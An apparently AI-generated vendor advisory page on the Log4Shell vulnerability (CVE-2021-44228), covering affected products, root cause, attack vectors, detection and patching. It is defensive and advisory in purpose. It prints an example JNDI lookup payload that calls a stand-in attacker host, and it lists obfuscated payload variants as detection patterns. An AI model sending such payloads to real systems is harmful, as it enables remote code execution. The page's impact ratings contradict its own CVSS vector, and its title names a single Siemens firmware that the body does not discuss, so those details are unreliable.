The SentinelOne Annual Threat Report - A Defenders Guide from the FrontlinesThe SentinelOne Annual Threat ReportGet the Report
Experiencing a Breach?Blog
Get StartedContact Us
SentinelOne
  • Platform
    Platform Overview
    • Singularity Platform
      Welcome to Integrated Enterprise Security
    • AI for Security
      Leading the Way in AI-Powered Security Solutions
    • Securing AI
      Accelerate AI Adoption with Secure AI Tools, Apps, and Agents.
    • How It Works
      The Singularity XDR Difference
    • Singularity Marketplace
      One-Click Integrations to Unlock the Power of XDR
    • Pricing & Packaging
      Comparisons and Guidance at a Glance
    Data & AI
    • Purple AI
      Accelerate SecOps with Generative AI
    • Singularity Hyperautomation
      Easily Automate Security Processes
    • AI-SIEM
      The AI SIEM for the Autonomous SOC
    • Data Pipelines
      Security Data Pipeline for AI SIEM and Data Optimization
    • Singularity Data Lake
      AI-Powered, Unified Data Lake
    • Singularity Data Lake for Log Analytics
      Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
    Endpoint Security
    • Singularity Endpoint
      Autonomous Prevention, Detection, and Response
    • Singularity XDR
      Native & Open Protection, Detection, and Response
    • Singularity RemoteOps Forensics
      Orchestrate Forensics at Scale
    • Singularity Threat Intelligence
      Comprehensive Adversary Intelligence
    • Singularity Vulnerability Management
      Application & OS Vulnerability Management
    • Singularity Identity
      Identity Threat Detection and Response
    Cloud Security
    • Singularity Cloud Security
      Block Attacks with an AI-Powered CNAPP
    • Singularity Cloud Native Security
      Secure Cloud and Development Resources
    • Singularity Cloud Workload Security
      Real-Time Cloud Workload Protection Platform
    • Singularity Cloud Data Security
      AI-Powered Threat Detection for Cloud Storage
    • Singularity Cloud Security Posture Management
      Detect and Remediate Cloud Misconfigurations
    Securing AI
    • Prompt Security
      Secure AI Tools Across Your Enterprise
  • Why SentinelOne?
    Why SentinelOne?
    • Why SentinelOne?
      Cybersecurity Built for What’s Next
    • Our Customers
      Trusted by the World’s Leading Enterprises
    • Industry Recognition
      Tested and Proven by the Experts
    • About Us
      The Industry Leader in Autonomous Cybersecurity
    Compare SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Verticals
    • Energy
    • Federal Government
    • Finance
    • Healthcare
    • Higher Education
    • K-12 Education
    • Manufacturing
    • Retail
    • State and Local Government
  • Services
    Managed Services
    • Managed Services Overview
      Wayfinder Threat Detection & Response
    • Threat Hunting
      World-Class Expertise and Threat Intelligence
    • Managed Detection & Response
      24/7/365 Expert MDR Across Your Entire Environment
    • Incident Readiness & Response
      DFIR, Breach Readiness, & Compromise Assessments
    Support, Deployment, & Health
    • Technical Account Management
      Customer Success with Personalized Service
    • SentinelOne GO
      Guided Onboarding & Deployment Advisory
    • SentinelOne University
      Live and On-Demand Training
    • Services Overview
      Comprehensive Solutions for Seamless Security Operations
    • SentinelOne Community
      Community Login
  • Partners
    Our Network
    • MSSP Partners
      Succeed Faster with SentinelOne
    • Singularity Marketplace
      Extend the Power of S1 Technology
    • Cyber Risk Partners
      Enlist Pro Response and Advisory Teams
    • Technology Alliances
      Integrated, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Hosted in AWS Regions Around the World
    • Channel Partners
      Deliver the Right Solutions, Together
    • SentinelOne for Google Cloud
      Unified, Autonomous Security Giving Defenders the Advantage at Global Scale
    • Partner Locator
      Your Go-to Source for Our Top Partners in Your Region
    Partner Portal→
  • Resources
    Resource Center
    • Case Studies
    • Data Sheets
    • eBooks
    • Reports
    • Videos
    • Webinars
    • Whitepapers
    • Events
    View All Resources→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • SentinelOne Blog
    Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthology
    • Cybersecurity 101
  • About
    About SentinelOne
    • About SentinelOne
      The Industry Leader in Cybersecurity
    • Investor Relations
      Financial Information & Events
    • SentinelLABS
      Threat Research for the Modern Threat Hunter
    • Careers
      The Latest Job Opportunities
    • Press & News
      Company Announcements
    • Cybersecurity Blog
      The Latest Cybersecurity Threats, News, & More
    • FAQ
      Get Answers to Our Most Frequently Asked Questions
    • DataSet
      The Live Data Platform
    • S Foundation
      Securing a Safer Future for All
    • S Ventures
      Investing in the Next Generation of Security, Data and AI
  • Pricing
Get StartedContact Us
CVE Vulnerability Database
Vulnerability Database/CVE-2021-44228

CVE-2021-44228: Siemens 6bk1602-0aa12-0tp0 RCE Flaw

CVE-2021-44228 is a critical remote code execution vulnerability affecting Siemens 6bk1602-0aa12-0tp0 Firmware via Apache Log4j2. Attackers can execute arbitrary code through JNDI injection. This article covers technical details, affected versions, impact analysis, and mitigation strategies.

Published: March 4, 2026

CVE-2021-44228 Overview

CVE-2021-44228, commonly known as "Log4Shell," is a critical remote code execution vulnerability in Apache Log4j2, a widely-used Java logging library. The vulnerability exists in Log4j2 versions 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1). The JNDI (Java Naming and Directory Interface) features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

This vulnerability has been added to CISA's Known Exploited Vulnerabilities (KEV) catalog, indicating active exploitation in the wild. Multiple proof-of-concept exploits are publicly available, and the vulnerability has been extensively weaponized by threat actors ranging from opportunistic attackers to nation-state adversaries.

Critical Impact

Unauthenticated remote attackers can achieve complete system compromise by injecting malicious JNDI lookup strings into logged data, enabling arbitrary code execution on vulnerable servers without any user interaction.

Affected Products

  • Apache Log4j 2.0-beta9 through 2.15.0 (core library)
  • Cisco Products (DNA Center, Identity Services Engine, Unified Communications Manager, Webex Meetings Server, and 100+ additional products)
  • Siemens Industrial Products (SPPA-T3000, Teamcenter, MindSphere, Industrial Edge Management, and numerous automation systems)
  • NetApp Products (Active IQ Unified Manager, Cloud Manager, SnapCenter, OnCommand Insight)
  • Intel Products (Datacenter Manager, System Studio, Secure Device Onboard)
  • Debian Linux 9.0, 10.0, 11.0
  • Fedora 34, 35
  • VMware Products (vCenter Server, multiple enterprise products)
  • SonicWall Email Security
  • Apple Xcode
  • Bentley Synchro and Synchro 4D

Discovery Timeline

  • 2021-12-10 - CVE-2021-44228 published to NVD
  • 2026-02-20 - Last updated in NVD database

Technical Details for CVE-2021-44228

Vulnerability Analysis

Log4Shell exploits a dangerous feature in Apache Log4j2's message lookup substitution mechanism. When Log4j2 processes a log message, it evaluates special lookup expressions embedded within the message string. The JNDI Lookup feature, in particular, allows the logging framework to retrieve values from external sources via JNDI, which supports multiple protocols including LDAP, RMI, and DNS.

The vulnerability arises because Log4j2 does not properly validate or sanitize JNDI lookup strings before processing them. When an attacker injects a malicious string such as ${jndi:ldap://attacker.com/exploit} into any input field that eventually gets logged, Log4j2 attempts to resolve this lookup by connecting to the attacker-controlled server. The malicious LDAP server can then respond with a reference to a remote Java class, which Log4j2 downloads and executes with the privileges of the application.

This vulnerability is particularly devastating because logging is ubiquitous in Java applications. Any user-controllable data that gets logged—including HTTP headers (User-Agent, X-Forwarded-For), form fields, API parameters, or even authentication credentials—becomes an attack vector.

Root Cause

The root cause is improper input validation (CWE-20) combined with expression language injection (CWE-917) in Log4j2's message lookup substitution feature. The library's design allowed arbitrary JNDI lookups to be triggered from untrusted log message content without any security restrictions. The MessagePatternConverter class recursively processes lookup patterns without distinguishing between trusted configuration data and untrusted user input. This architectural flaw meant that any string passed to log methods could potentially trigger remote class loading and execution.

Attack Vector

The attack is network-based and requires no authentication or user interaction. An attacker simply needs to find an input field in a vulnerable application that gets logged by Log4j2. Common attack vectors include:

  1. HTTP Headers: Injecting payloads into User-Agent, X-Api-Version, X-Forwarded-For, or custom headers
  2. Form Fields: Submitting malicious strings in login forms, search boxes, or any user input
  3. API Parameters: Including payloads in REST API request bodies or query parameters
  4. Authentication Data: Using malicious usernames or other authentication fields

When the vulnerable application logs the attacker's input, Log4j2 processes the JNDI lookup, connects to the attacker's server, downloads a malicious Java class, and executes it. The attack can be conducted without any prior access to the target system, making it trivially exploitable at scale.

The typical exploitation flow involves sending a crafted request containing a JNDI lookup string. For example, an HTTP request with a malicious User-Agent header triggers Log4j2 to resolve the JNDI reference when logging the request. The attacker's LDAP server responds with a reference to a malicious class file, which is then loaded and executed by the vulnerable Java application, granting the attacker remote code execution capabilities.

Detection Methods for CVE-2021-44228

Indicators of Compromise

  • Outbound LDAP (port 389/636), RMI (port 1099), or DNS connections to unusual or unknown external IP addresses from application servers
  • Log entries containing suspicious patterns such as ${jndi:ldap://, ${jndi:rmi://, ${jndi:dns://, or obfuscated variants like ${${lower:j}ndi:, ${j${::-n}di:}
  • Unexpected Java class files or JAR files downloaded to temporary directories or application paths
  • Anomalous process spawning from Java applications, particularly shell commands or PowerShell executions
  • DNS queries for domains associated with known Log4Shell exploitation infrastructure

Detection Strategies

  • Deploy network monitoring rules to detect JNDI-related outbound traffic patterns and connections to suspicious external endpoints
  • Implement web application firewall (WAF) rules to block requests containing Log4Shell payload patterns, including obfuscated variants
  • Conduct software composition analysis (SCA) scans to identify all instances of vulnerable Log4j2 versions in your environment
  • Review application logs for evidence of exploitation attempts by searching for ${jndi: patterns and their obfuscated forms
  • Use specialized Log4Shell vulnerability scanners such as those available from CISA to identify vulnerable systems

Monitoring Recommendations

  • Enable enhanced logging for Java applications and monitor for JNDI-related errors or unusual class loading activity
  • Configure SIEM rules to alert on Log4Shell-specific patterns in web server logs, application logs, and network traffic
  • Monitor for post-exploitation indicators including reverse shells, cryptocurrency miners, ransomware deployment, and lateral movement
  • Track threat intelligence feeds for new Log4Shell exploitation techniques and payload obfuscation methods

How to Mitigate CVE-2021-44228

Immediate Actions Required

  • Upgrade Apache Log4j2 to version 2.17.0 or later (or 2.12.3 / 2.3.1 for Java 7/6 respectively) immediately on all affected systems
  • If immediate patching is not possible, set the system property log4j2.formatMsgNoLookups=true or remove the JndiLookup class from the classpath
  • Block outbound LDAP, RMI, and suspicious DNS traffic from application servers at the network perimeter
  • Conduct a comprehensive inventory of all Java applications and third-party products to identify vulnerable Log4j2 instances
  • Apply vendor-specific patches for affected products from Cisco, Siemens, VMware, NetApp, and other vendors

Patch Information

Apache has released multiple patched versions addressing this vulnerability:

  • Log4j 2.17.0 (Java 8+): Completely removes JNDI lookup functionality by default
  • Log4j 2.16.0 (Java 8+): Disables JNDI lookup functionality by default (additional CVE-2021-45046 fix in 2.17.0)
  • Log4j 2.12.3 (Java 7): Backported fix for Java 7 environments
  • Log4j 2.3.1 (Java 6): Backported fix for legacy Java 6 environments

Organizations should upgrade to the latest available version. The Apache Log4j Security Page provides comprehensive upgrade guidance. Major vendors including Cisco, Siemens, Oracle, and Microsoft have released advisories with product-specific patch information.

Workarounds

  • Set the JVM option -Dlog4j2.formatMsgNoLookups=true to disable message lookup substitution (effective for Log4j2 2.10.0 and later)
  • Remove the JndiLookup class from the log4j-core JAR file using: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
  • For containerized applications, update base images to include patched Log4j2 versions and redeploy
  • Implement egress filtering to block outbound LDAP (389/636), RMI (1099), and LDAPS connections from application servers
bash
# Remove JndiLookup class from log4j-core JAR (temporary mitigation)
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

# Set JVM property to disable lookups (for Log4j 2.10.0+)
# Add to application startup script or JAVA_OPTS
export JAVA_OPTS="$JAVA_OPTS -Dlog4j2.formatMsgNoLookups=true"

# Alternative: Set environment variable (for Log4j 2.10.0+)
export LOG4J_FORMAT_MSG_NO_LOOKUPS=true

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

  • Vulnerability Details
  • TypeRCE

  • Vendor/TechApache Log4j

  • SeverityCRITICAL

  • CVSS Score10.0

  • EPSS Probability94.36%

  • Known ExploitedYes
  • CVSS Vector
  • CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  • Impact Assessment
  • ConfidentialityLow
  • IntegrityNone
  • AvailabilityHigh
  • CISA KEV Information
  • In CISA KEVYes
  • CWE References
  • CWE-20

  • CWE-917
  • Technical References
  • Packet Storm Log4j2 RCE

  • Packet Storm VMware Advisory 2021-0028

  • Packet Storm Log4j2 Info Disclosure

  • Packet Storm Log4j2 RCE

  • Packet Storm Log4Shell Regexes

  • Packet Storm Log4j Payload Generator

  • Packet Storm L4sh Log4j RCE

  • Packet Storm Log4j Bypass RCE

  • Packet Storm Log4j Extended Scanner

  • Packet Storm VMware Advisory 2021-0028.4

  • Packet Storm Log4Shell HTTP Header Injection

  • Packet Storm VMware vCenter RCE

  • Packet Storm UniFi Network RCE

  • Packet Storm Open-Xchange XSS Injection

  • Packet Storm MobileIron Log4Shell RCE

  • Packet Storm AD Manager Plus RCE

  • Full Disclosure December 2022

  • Full Disclosure July 2022

  • Full Disclosure March 2022

  • OpenWall OSS-Security December 10, 2021 - 3

  • OpenWall OSS-Security December 13, 2021 - 1

  • OpenWall OSS-Security December 13, 2021 - 2

  • OpenWall OSS-Security December 14, 2021 - 4

  • OpenWall OSS-Security December 15, 2021 - 3

  • Siemens Security Cert SSA-397453

  • Siemens Security Cert SSA-479842

  • Siemens Security Cert SSA-661247

  • Siemens Security Cert SSA-714170

  • GitHub Log4j Affected Database

  • GitHub Log4j Software List

  • GitHub CVE-2021-44228 MITRE

  • Debian LTS Announcement December 2021

  • Fedora Package Announcement December 2021

  • Fedora Package Announcement December 2021 - 2

  • SonicWall SNWLID-2021-0032

  • NetApp Security Advisory NTAP-20211210-0007

  • Apple Support Page HT213189

  • Cisco Security Advisory Log4j

  • Twitter Update from Kurt Seifried

  • Bentley Common Vulnerability BE-2022-0001

  • Debian Security DSA-5020

  • Intel Security Advisory INTEL-SA-00646

  • CERT Vulnerability ID 930724

  • nu11secur1ty CVE-2021-44228 Post

  • Oracle Security Alert CVE-2021-44228

  • CISA Known Exploited Vulnerabilities - CVE-2021-44228
  • Vendor Resources
  • OpenWall OSS-Security December 10, 2021 - 1

  • OpenWall OSS-Security December 10, 2021 - 2

  • Apache Log4j Security Page

  • Microsoft Blog on CVE-2021-44228

  • Oracle CPU April 2022 Security Alerts

  • Oracle CPU January 2022 Security Alerts
  • Related CVEs
  • CVE-2021-45046: Apache Log4j RCE Vulnerability

  • CVE-2022-23302: Apache Log4j JMSSink RCE Vulnerability

  • CVE-2021-4104: Apache Log4j 1.2 JMSAppender RCE Flaw

  • CVE-2021-44832: Apache Log4j RCE Vulnerability
Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the World’s Most Advanced Cybersecurity Platform

See how our intelligent, autonomous cybersecurity platform can protect your organization now and into the future.

Try SentinelOne
  • Get Started
  • Get a Demo
  • Product Tour
  • Why SentinelOne
  • Pricing & Packaging
  • FAQ
  • Contact
  • Contact Us
  • Customer Support
  • SentinelOne Status
  • Language
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Verticals
  • Energy
  • Federal Government
  • Finance
  • Healthcare
  • Higher Education
  • K-12 Education
  • Manufacturing
  • Retail
  • State and Local Government
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Videos
  • Product Tours
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Press
  • News
  • Ransomware Anthology
  • Company
  • About Us
  • Our Customers
  • Careers
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • Investor Relations
  • S Foundation
  • S Ventures

©2026 SentinelOne, All Rights Reserved.

Privacy Notice Terms of Use

English